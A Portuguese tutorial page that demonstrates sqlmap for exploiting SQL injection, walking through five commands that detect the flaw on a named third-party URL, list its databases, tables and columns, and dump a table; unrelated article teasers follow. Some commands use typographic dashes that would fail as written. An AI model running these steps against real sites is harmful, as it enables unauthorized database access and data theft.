Nesta seção, LuckyTemplates apresentará algumas ferramentas usadas para explorar SQL Injection .
Atualmente existem muitas ferramentas de verificação de vulnerabilidades de segurança (incluindo injeção de SQL). Essas ferramentas permitem detectar e explorar vulnerabilidades de injeção SQL com bastante força. Algumas ferramentas de exploração automática de vulnerabilidade de injeção SQL comumente usadas incluem:
Existem também algumas outras ferramentas que você pode consultar, como: Netsparker, jSQL Injection, Burp, BBQSQL...
Abaixo está uma demonstração do uso do Sqlmap para explorar a injeção SQL básica.
Você baixa o Sqlmap em http://sqlmap.org/
Sqlmap é escrito em Python, então para usar esta ferramenta você precisa instalar o Python. Você pode baixar python em http://www.python.org/downloads/
Primeiro você deve identificar o site alvo, aqui tenho o seguinte alvo: http://zerocoolhf.altervista.org/level1.php?id=1 (esta página agora está morta).
Passo 1 : Abra o cmd e digite o seguinte comando:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
O sqlmap detectará a vulnerabilidade do alvo e fornecerá informações sobre a vulnerabilidade.
Etapa 2 : depois de determinarmos que o site de destino tem uma vulnerabilidade de injeção de SQL, prosseguimos para encontrar o nome do banco de dados.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Banco de dados: my_zerocoolhf
Etapa 3 : Após determinar o nome do banco de dados, continuaremos procurando os nomes das tabelas no banco de dados.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> Existem 2 tabelas no banco de dados: auth e book
Etapa 4 : Determine os nomes das colunas da tabela
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Identifique as colunas da tabela do livro: autor, id, preço, título.
Etapa 5 : despeje os dados da tabela.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> Obtivemos assim o banco de dados do site alvo.
Acima está uma demonstração básica do uso do sqlmap para explorar erros de injeção de SQL. Você pode aprender mais sobre as opções do sqlmap em https://github.com/sqlmapproject/sqlmap/wiki/Usage para dar suporte à exploração. Exploração de injeção de SQL.
Você vê uma notificação de ativação do Windows 10 no canto direito da tela? Este artigo irá orientá-lo sobre como excluir o aviso de solicitação de direitos autorais no Windows 10.
Recentemente, a Microsoft lançou a atualização cumulativa mais recente para usuários de PC com Windows 10, chamada Build 14393.222. Esta atualização lançada para o Windows 10 corrige principalmente bugs com base no feedback do usuário e melhora a experiência de desempenho do sistema operacional.
Você tem computadores em sua rede local que precisam de acesso externo? Usar um host bastião como gatekeeper para sua rede pode ser uma boa solução.
Às vezes, pode ser necessário excluir logs de eventos antigos de uma só vez. Neste guia, Quantrimang.com mostrará três maneiras de excluir rapidamente todos os logs de eventos no Visualizador de Eventos do Windows 10.
Se você preferir usar um teclado clássico antigo, como o IBM Modelo M, que não inclui uma tecla física do Windows, existe um método fácil de adicionar mais, pegando emprestada uma tecla que você não usa com frequência.
WindowTop é uma ferramenta que tem a capacidade de escurecer todas as janelas de aplicativos e programas em execução em computadores com Windows 10. Ou você pode usar uma interface de fundo escuro no Windows.
Em muitos artigos anteriores, mencionamos que permanecer anônimo online é extremamente importante. Informações privadas vazam todos os anos, tornando a segurança online cada vez mais necessária. Essa também é a razão pela qual devemos usar endereços IP virtuais. Abaixo, aprenderemos sobre métodos para criar IPs falsos!
A barra de idiomas do Windows 8 é uma barra de ferramentas de idiomas em miniatura projetada para ser exibida automaticamente na tela da área de trabalho. No entanto, muitas pessoas desejam ocultar esta barra de idiomas na barra de tarefas.
Maximizar a velocidade da Internet é essencial para otimizar sua conexão de rede. Você pode ter uma ótima experiência de entretenimento e trabalho usando computadores, TVs com Internet, consoles de jogos, etc.
A conectividade sem fio é uma necessidade hoje e por isso a segurança sem fio é essencial para garantir a segurança da sua rede interna.
